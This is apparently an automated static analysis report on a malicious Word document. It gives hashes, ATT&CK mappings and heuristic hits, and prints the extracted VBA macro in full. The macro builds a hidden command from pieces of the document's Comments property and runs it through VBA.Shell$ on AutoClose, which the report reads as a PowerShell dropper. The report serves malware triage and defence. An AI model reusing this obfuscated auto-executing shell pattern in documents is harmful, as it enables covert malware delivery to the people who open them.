Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cde441ea369c7a3c…

MALICIOUS

Office (OLE)

Size: 73.5 KB
Created: 2017-10-10 10:35:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: cf87896fe73ae17b04d6403c16ecdb5b
SHA-1: ebc8918dd51421906bd57d21d57d6114ea9d9c2d
SHA-256: cde441ea369c7a3c7ef7595ab41ad63bc8c329702208623eb1990af96c9781fb
Risk Score: 212

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoClose macro is configured to execute a PowerShell command, indicated by the 'SC_STR_POWERSHELL' heuristic and the 'Shell()' call; the command string itself is assembled at runtime from substrings of the document's "Comments" property, which hides it from simple string scans. This suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.HeuristicShellOnClose-6370606-0' further supports this dropper functionality.

Heuristics (8)

  • ClamAV: Doc.Dropper.HeuristicShellOnClose-6370606-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HeuristicShellOnClose-6370606-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
    VBA.Shell$ RnNFqMdzqF, 0
    End Sub
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    End Sub
    Sub AutoClose()
    DTOLsiGSQ
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5229 bytes
SHA-256: 239a7075559926ab49c94fe88e3e64829957026fb45bab1b5c0b32d6cc169496
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
44 of 69 identifiers look randomly generated (e.g. 'JaPabOCDnrS') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub DTOLsiGSQ()
HnDwfUkEWs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11977, 129)
zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5951, 144)
AashkRSbk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7648, 153)
pTjDWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12572, 63)
RanvzdFlj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10593, 165)
zVufuPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6998, 53)
fNsAaLD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 376, 131)
wfjfFcGM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1558, 60)
DfficPhpunl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14147, 108)
tGCDh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14058, 27)
laQLnTo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10299, 115)
SZikTCn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10962, 161)
QktVJBpIY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3182, 6)
DYYZKJdP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6796, 199)
JaPabOCDnrS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9930, 118)
RCbPQOWf = HnDwfUkEWs + zBfEn + AashkRSbk + pTjDWz + RanvzdFlj + zVufuPP + fNsAaLD + wfjfFcGM + DfficPhpunl + tGCDh + laQLnTo + SZikTCn + QktVJBpIY + DYYZKJdP + JaPabOCDnrS
LtAJaKYYfk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2949, 106)
dvhmmF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14092, 53)
HAzHWitMAzP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 581, 71)
XOiNtccS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5220, 64)
oKszTjbj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3535, 76)
GlKutm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14394, 10)
LXhVrkG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1792, 12)
ZtcJcNdKwik = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4368, 174)
ZNoGTlDn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2341, 81)
kLGVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13287, 45)
HqmkCqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13714, 118)
XjjzIHri = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9234, 140)
jlRUdLF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8269, 162)
zVsoqdWtnt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12844, 142)
qGpOWEWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13099, 14)
YWVnjpW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7408, 111)
zDHCHfss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8915, 72)
NDpcwpfcGH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10176, 100)
pNdzVTDwh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8735, 157)
UZUjDhjiL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5499, 68)
PQiuYw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5303, 169)
PBROOt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 845, 25)
JYpXEq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9379, 182)
DcFbuXc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6529, 158)
dzMObuEvT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9622, 175)
CKFqiXZF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5025, 160)
GZrNrwsZS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8057, 93)
WjlvMvid = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7846, 44)
livSsWPz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1295, 196)
WYzWYVBjwLV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2824, 6)
EfbUuSb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8576, 124)
mEVqvuwZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11147, 112)
vuCwjOXr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13860, 124)
iYFkTrmRCUi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 124, 5)
umvAh = RCbPQOWf + LtAJaKYYfk + dvhmmF + HAzHWitMAzP + XOiNtccS + oKszTjbj + GlKutm + LXhVrkG + ZtcJcNdKwik + ZNoGTlDn + kLGVp + HqmkCqw + XjjzIHri + jlRUdLF + zVsoqdWtnt + qGpOWEWz + YWVnjpW + zDHCHfss + NDpcwpfcGH + pNdzVTDwh + UZUjDhjiL + PQiuYw + PBROOt + JYpXEq + DcFbuXc + dzMObuEvT + CKFqiXZF + GZrNrwsZS + WjlvMvid + livSsWPz + WYzWYVBjwLV + EfbUuSb + mEVqvuwZ + vuCwjOXr + iYFkTrmRCUi
ZitGUBhrFX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4116, 7)
rzNwlWDIj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 45, 1)
zznHLo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2466, 1)
RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
DTOLsiGSQ
End Sub